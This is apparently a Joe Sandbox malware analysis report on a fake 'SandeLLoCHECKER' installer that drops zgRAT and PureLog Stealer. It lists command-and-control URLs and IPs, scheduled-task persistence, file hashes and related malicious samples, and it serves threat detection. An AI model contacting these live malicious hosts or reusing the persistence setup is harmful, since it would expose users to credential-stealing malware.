http://185.246.67.73d | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003427000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://discord.semkrill.ru/= | SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://semkrill.ru/contact(5h | SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.dr | false | | high
http://www.fontbureau.com/designers | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z4p | SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.semkrill.ru/AI_CLEAN_RESOURCES_USER_PROMPT_BASIC_UI0AI_APP_FILE | SandeLLoCHECKER_Installer.msi.3.dr | false | Avira URL Cloud: safe | unknown
https://semkrill.ru/contact( | SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://semkrill.ru/supporth1h | SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.dr | false | | high
https://discord.semkrill.ru/ | SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.urwpp.deDPlease | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://185.246.67.73 | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | webDriverintoDll.exe, 0000000B.00000002.1844340465.00000000031DA000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://185.246H | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://semkrill.ru/support | SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.dr | false | | high
https://semkrill.ru/contact | SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2898761896.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmp | false |
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                                          high
                                                                                          https://semkrill.ru/supportAI_SHORTCUTTABLE_FLAGSCOLUMNAQAAAA8AAABTAGEAbgBkAGUATABMAG8AQwBIAEUAQwBLASandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707913300.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.msi.3.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.ecosia.org/newtab/KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                                            high
                                                                                            http://www.carterandcone.comlKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://sandello.rugorkmTnChA.exefalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://ac.ecosia.org/autocomplete?q=KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                                                high
                                                                                                https://semkrill.ru/contactWindowsTypeNT40DisplayWindowsSandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707913300.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.msi.3.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.founder.com.cn/cnKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.fontbureau.com/designers/frere-user.htmlKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://discord.semkrill.ru/hSandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://discord.semkrill.ru/gSandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://semkrill.ru/supporthPhSandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.jiyu-kobo.co.jp/KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.fontbureau.com/designers8KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://semkrill.ru/supportEYSandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003427000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                                                            high
                                                                                                            https://cdn.semkrill.ru/SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.184.109 | cdn.semkrill.ru | United States | 13335 | CLOUDFLARENETUS | true
185.246.67.73 | unknown | Russian Federation | 29182 | THEFIRST-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1570976
Start date and time: 2024-12-08 15:26:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: gorkmTnChA.exe (renamed because the original name is a hash value)
Original Sample Name: E4E1923F51EB61ED20CBBFAB84AB25B5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@46/102@1/2
EGA Information:
• Successful, ratio: 83.3%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, ApplicationFrameHost.exe
• Excluded IPs from analysis (whitelisted): 2.22.50.131, 2.22.50.144
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target KAdpNCgonFhCnlBRasdZerWl.exe, PID 8132 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: gorkmTnChA.exe
Time | Type | Description
09:27:21 | API Interceptor | 1321502x Sleep call for process: KAdpNCgonFhCnlBRasdZerWl.exe modified
14:27:13 | Task Scheduler | Run new task: ApplicationFrameHost path: "C:\Users\Default User\Favorites\ApplicationFrameHost.exe"
14:27:13 | Task Scheduler | Run new task: ApplicationFrameHostA path: "C:\Users\Default User\Favorites\ApplicationFrameHost.exe"
14:27:13 | Task Scheduler | Run new task: KAdpNCgonFhCnlBRasdZerWl path: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
14:27:13 | Task Scheduler | Run new task: KAdpNCgonFhCnlBRasdZerWlK path: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            172.67.184.10900onP4lQDK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              https://insee-inscrire.fr/Verification.phpGet hashmaliciousUnknownBrowse
                                                                                                                https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=http://hFfpQ.accussibrand.com/croantree@csr.com.auGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  cdn.semkrill.ru00onP4lQDK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  THEFIRST-ASRUhome.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                  • 37.230.119.182
                                                                                                                  x86-20241130-2047.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 82.146.62.180
                                                                                                                  sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 62.109.30.187
                                                                                                                  UNFOT5F1qt.exeGet hashmaliciousDCRatBrowse
                                                                                                                  • 188.120.228.203
                                                                                                                  RustChecker.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                  • 188.120.239.221
                                                                                                                  https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                  • 78.24.219.84
                                                                                                                  https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29tGet hashmaliciousUnknownBrowse
                                                                                                                  • 78.24.219.84
                                                                                                                  https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29tGet hashmaliciousUnknownBrowse
                                                                                                                  • 78.24.219.84
                                                                                                                  exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                                  • 37.46.129.215
                                                                                                                  https://sourcetrap.netGet hashmaliciousUnknownBrowse
                                                                                                                  • 82.202.163.23
                                                                                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                  • 172.67.165.166
                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 172.67.165.166
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  QZKG2scmaT.exeGet hashmaliciousPonyBrowse
                                                                                                                  • 172.67.180.93
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.20.3.235
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 37f463bf4616ecd445d4a1937da06e19
  esetonlinescanner.exe | Get hash | malicious | Unknown | Browse | 172.67.184.109
  esetonlinescanner.exe | Get hash | malicious | Unknown | Browse | 172.67.184.109
  h0UP1BcPk5.lnk | Get hash | malicious | Unknown | Browse | 172.67.184.109
  vzHOEzLbDj.exe | Get hash | malicious | Unknown | Browse | 172.67.184.109
  WaveExecutor.exe | Get hash | malicious | Unknown | Browse | 172.67.184.109
  Nexus-Executor.exe | Get hash | malicious | Unknown | Browse | 172.67.184.109
  WaveExecutor.exe | Get hash | malicious | Unknown | Browse | 172.67.184.109
  Nexus-Executor.exe | Get hash | malicious | Unknown | Browse | 172.67.184.109
  Xeno Executor.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 172.67.184.109
  file.exe | Get hash | malicious | Amadey, CredGrabber, LummaC Stealer, Meduza Stealer, Stealc, Vidar | Browse | 172.67.184.109
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dll
  00onP4lQDK.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
  Px0b16q72c.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type: ASCII text, with very long lines (838), with no line terminators
Category: dropped
Size (bytes): 838
Entropy (8bit): 5.905488006641125
Encrypted: false
SSDEEP: 24:C/4zTnyT0LpEahKGjRMa79weJ9UHAsvtCu++InOleC6bJoZJg8:L3nzyG2E9weJ97Q++avCIJoZJg8
MD5: 0D5FFC1EE5F145E9D40B162210A07370
SHA1: A23C8D6AAC17F93011C96C212EE095100AF9A693
SHA-256: 0FF960050DCE24275451E6074FFCEE956A7D25B45D373AE8B4D70625B772543A
SHA-512: 9E11B89023B858DA38479DE1CA3991132977649E0495A8645D737C7F595968492C32F7BC2D9248A0FDE4EF87AA4A86489CD1A44775627054F1F7EA2D2F7F062C
Malicious: false
Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3538432
Entropy (8bit): 7.811102685383502
Encrypted: false
SSDEEP: 49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
MD5: 26C2B88440A62B4CB79201E01A404BD2
SHA1: AD784AF316C9674AB5963D9F3144EAB1A41DA087
SHA-256: B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
SHA-512: EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 54
Entropy (8bit): 5.074241437308591
Encrypted: false
SSDEEP: 3:xHQBcJqA9EWJn9n:Fl59B/
MD5: 7B31840A1C8FE7DD2441893CFB52DA5C
SHA1: 266115F8ADBC3C8F4DFA5BA3FA1DEAA4EC36E1F2
SHA-256: 1453B57944DBE52D1C295BB6F4FB8E55471686307E345A170629ED2F6A614432
SHA-512: AF376B8076CB12D74154CA63A7DC6D2480A76B9D3D44FFB3A779A8CB3676A0A3F6A6B2DB55879AA52AEA5B40F6FF48EFC92DD87FCF1824040FF4121E1DB97355
Malicious: false
Preview: 9DAR04kEGuPhhkqRpuOjrmyLiylLvF7CrwxjwXaSNAiwfYZ6fUiwPa
Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3538432
Entropy (8bit): 7.811102685383502
Encrypted: false
SSDEEP: 49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
MD5: 26C2B88440A62B4CB79201E01A404BD2
SHA1: AD784AF316C9674AB5963D9F3144EAB1A41DA087
SHA-256: B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
SHA-512: EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 63%
Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type: ASCII text, with very long lines (309), with no line terminators
Category: dropped
Size (bytes): 309
Entropy (8bit): 5.747802276786102
Encrypted: false
SSDEEP: 6:UJknM9EMFiH02RsmUDPxlpwBk52IA10no4rrsugAI0:UJxCA+04sPDfeBS7A+o4/s3Ab
MD5: F87A394D5AF33C43D669075035BC58E2
SHA1: 1FB1D17998EA079AEAC52F5EE1DE6085DEF97382
SHA-256: 6E08BEAE068CD02C17A650F108DF3C4197697C656088A7BCBC709A3E9EF62299
SHA-512: 340FFA6C3D095C1464FC92C82E7B02985501CABA44D3CBB0B70D3FA5ABC684771FA073F7EF818745CD077B9298B450530217232CD79A9A4D41D028CE5CD815B8
Malicious: false
Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3538432
Entropy (8bit): 7.811102685383502
Encrypted: false
SSDEEP: 49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
MD5: 26C2B88440A62B4CB79201E01A404BD2
SHA1: AD784AF316C9674AB5963D9F3144EAB1A41DA087
SHA-256: B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
SHA-512: EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 63%
Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type: ASCII text, with very long lines (654), with no line terminators
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.875502762551949
Encrypted: false
SSDEEP: 12:6BDTiS670dnA/WGmoNn1ufWU7tEXFMsWMyD5bo0PrKt36J/iQBm9sJHUlg9T2:qPiS6cOWGvjGuX6fMk5TPWtdQceJHn9K
MD5: 6C77E8F53162E45ADFE7FCB5B043C8E9
SHA1: 864EA1FEC7815DEAAFD7D05B1D527B1813886A65
SHA-256: ACFED4161068F2B85CB0F0168652A208D4A44FE2589615685A67547519991F8A
SHA-512: 8FB686BFDD0F08FC059F8B3AFD882298D2033D167F5378FDF8A22DD4FC8D4A0F5220476E35B63AF6ADABF9FCF8C11075EA44BC0DFE3E0E2438E612B0A62F604D
Malicious: false
Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
